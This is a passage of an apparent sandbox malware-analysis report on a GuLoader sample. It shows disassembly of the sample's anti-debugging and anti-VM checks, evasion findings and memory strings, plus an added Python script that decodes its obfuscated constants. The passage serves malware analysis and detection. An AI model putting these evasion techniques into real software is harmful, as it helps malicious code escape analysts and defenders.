    0x00000076 mov dword ptr [ebp+000001BEh], esi
    0x0000007c test cl, dl
    0x0000007e mov esi, E709E43Eh
    0x00000083 pushad
    0x00000084 mov ebx, 000000A7h
    0x00000089 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000000565E68 second address: 0000000000569606 instructions:
    0x00000000 rdtsc
    0x00000002 popad
    0x00000003 push ecx
    0x00000004 mov ecx, dword ptr [ebp+000001D9h]
    0x0000000a mov dword ptr [ebp+00000212h], ecx
    0x00000010 mov ecx, eax
    0x00000012 push ecx
    0x00000013 mov ecx, dword ptr [ebp+00000212h]
    0x00000019 push dword ptr [ebp+000000D0h]
    0x0000001f call 00007F7648790371h
    0x00000024 call 00007F764878CCF5h
    0x00000029 pop ebx
    0x0000002a sub ebx, 05h
    0x0000002d mov dword ptr [ebp+0000014Ch], edi
    0x00000033 jmp 00007F764878CDD9h
    0x00000038 pushad
    0x00000039 mov esi, 00000069h
    0x0000003e rdtsc
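The listings above never use a constant directly: every immediate is built with a mov or push followed by an add/sub/xor chain, a GuLoader habit that also defeats naive byte and constant signatures. The script below is an added example (not part of the Joe Sandbox report) that parses the listings exactly as they are printed in this report and folds those chains. Doing so shows what the checks actually compare against: the byte at [ebp+1EF] resolves to 0xCC, the INT3 opcode, so mov bl, byte ptr [eax] / cmp bl, ... is a scan for software breakpoints; eax before cpuid resolves to 1, i.e. CPUID leaf 1, whose ECX bit 31 (tested by bt ecx, 1Fh) is the hypervisor-present bit; and the three immediates pushed in the 0056177F listing all resolve to 0, leaving arguments of (0, 0, [ebp+24h], 0) for the call that follows. The call / pop ebx / sub ebx, 05h sequence in the other listings is the usual way position-independent code learns its own address. The emulation model is a simplification of mine: only immediates are tracked, memory slots are keyed by their textual operand, and the stack is modelled as a list of pushed values.

```python
import re

# Instruction listings copied verbatim from the report's "RDTSC instruction interceptor"
# evidence (the process 17 copies are the same code at a different base address).
INT3_SCAN = (
    "0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h "
    "0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax "
    "0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h "
    "0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h "
    "0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] "
    "0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si "
    "0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc"
)
CPUID_CHECK = (
    "0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret "
    "0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh "
    "0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh "
    "0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h "
    "0x00000036 lfence 0x00000039 rdtsc"
)
CALL_ARGS = (
    "0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [ebp+0000025Bh], eax "
    "0x00000009 mov eax, dword ptr [ebp+0000025Bh] 0x0000000f je 00007F7648A60C92h 0x00000015 test bl, bl "
    "0x00000017 push 038032CBh 0x0000001c sub dword ptr [esp], 0FF21A02h 0x00000023 xor dword ptr [esp], 10B6888Fh "
    "0x0000002a xor dword ptr [esp], E3389046h 0x00000031 push 2B523B77h 0x00000036 cmp dh, ch "
    "0x00000038 xor dword ptr [esp], 6A5053ABh 0x0000003f add dword ptr [esp], CC3008CFh "
    "0x00000046 xor dword ptr [esp], 0D3271ABh 0x0000004d push dword ptr [ebp+24h] "
    "0x00000050 mov dword ptr [ebp+000001F4h], edx 0x00000056 mov edx, 14EDA824h 0x0000005b add edx, 104167D9h "
    "0x00000061 xor edx, BB5692E1h 0x00000067 test al, dl 0x00000069 xor edx, 9E799D1Ch 0x0000006f push edx "
    "0x00000070 mov edx, dword ptr [ebp+000001F4h] 0x00000076 mov dword ptr [ebp+000001BEh], esi "
    "0x0000007c test cl, dl 0x0000007e mov esi, E709E43Eh 0x00000083 pushad 0x00000084 mov ebx, 000000A7h "
    "0x00000089 rdtsc"
)

ADDR = re.compile(r"0x[0-9a-fA-F]{8}\s+")              # per-instruction offsets printed by the report
IMM = re.compile(r"^([0-9A-Fa-f]+)h$")                  # MASM-style immediate, e.g. 0FF21A02h
ARITH = re.compile(r"^(mov|push|add|sub|xor)\s+(.+)$", re.I)
BYTE_REGS = {"al", "bl", "cl", "dl", "ah", "bh", "ch", "dh"}

def split_listing(listing):
    """Turn the report's one-line listing into a list of instruction strings."""
    return [s.strip() for s in ADDR.split(listing) if s.strip()]

def imm(tok):
    tok = tok.strip()
    if tok.lower() in BYTE_REGS:          # "ah"/"bh"/... would otherwise parse as hex 0xA/0xB
        return None
    m = IMM.match(tok)
    return int(m.group(1), 16) if m else None

def mask_for(dst):
    for size, mask in (("byte", 0xFF), ("word", 0xFFFF), ("dword", 0xFFFFFFFF)):
        if dst.startswith(size + " ptr"):
            return mask
    if dst in BYTE_REGS:
        return 0xFF
    return 0xFFFFFFFF if dst.startswith("e") else 0xFFFF   # eax.. vs ax/si/bx..

def resolve_constants(listing):
    """Fold mov/push-immediate followed by add/sub/xor-immediate chains.
    Returns the final value of every register or memory slot built that way and the
    list of pushed values (None = pushed from memory or an unknown register)."""
    slots, stack = {}, []
    for insn in split_listing(listing):
        m = ARITH.match(insn)
        if not m:
            continue                                  # cmp/test/jcc/cpuid/... leave the chains alone
        op, rest = m.group(1).lower(), m.group(2).strip()
        if op == "push":
            v = imm(rest)
            stack.append(v if v is not None else slots.get(rest.lower()))
            continue
        dst, _, src = rest.partition(",")
        dst, val = dst.strip().lower(), imm(src)
        on_stack = dst.endswith("[esp]")
        cur = (stack[-1] if stack else None) if on_stack else slots.get(dst)
        if val is None:                               # register/memory source: value becomes unknown
            new = None
        elif op == "mov":
            new = val
        elif cur is None:
            continue                                  # arithmetic on something we never resolved
        elif op == "add":
            new = cur + val
        elif op == "sub":
            new = cur - val
        else:
            new = cur ^ val
        if new is not None:
            new &= mask_for(dst)                      # wrap to the operand width, as the CPU does
        if on_stack:
            if stack:
                stack[-1] = new
        elif new is None:
            slots.pop(dst, None)
        else:
            slots[dst] = new
    return {"slots": slots, "stack": stack}

if __name__ == "__main__":
    for name, listing in (("INT3_SCAN", INT3_SCAN), ("CPUID_CHECK", CPUID_CHECK), ("CALL_ARGS", CALL_ARGS)):
        r = resolve_constants(listing)
        print(name, {k: hex(v) for k, v in r["slots"].items()},
              [hex(v) if v is not None else "?" for v in r["stack"]])
```

The same folding works on any of the other listings in this section; the push 64FFFEF9h chain in the 02264561 listing, for instance, also collapses to 0.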
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 rdtsc 1_2_02261C35
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Window / User API: foregroundWindowGot 513
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 6084 Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 Thread sleep count: 250 > 30
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 Thread sleep time: -125000s >= -30000s
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5328 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Last function: Thread delayed
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\ANNONCEKAMPAGNE.exe\ROGUYSoftware\Microsoft\Windows\CurrentVersion\RunOnceOTATE
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\ANNONCEKAMPAGNE.exe\ROGUYSet W = CreateObject("WScript.Shell")
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\JXblq0dqPN.exe System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 rdtsc 1_2_02261C35
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022664DD LdrInitializeThunk, 1_2_022664DD
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022685F4 mov eax, dword ptr fs:[00000030h] 1_2_022685F4
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267874 mov eax, dword ptr fs:[00000030h] 1_2_02267874
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267879 mov eax, dword ptr fs:[00000030h] 1_2_02267879
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022654A8 mov eax, dword ptr fs:[00000030h] 1_2_022654A8
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262D2C mov eax, dword ptr fs:[00000030h] 1_2_02262D2C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267377 mov eax, dword ptr fs:[00000030h] 1_2_02267377
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022637C8 mov eax, dword ptr fs:[00000030h] 1_2_022637C8

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: logs.dat.17.dr Binary or memory string: [ Program Manager ]
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior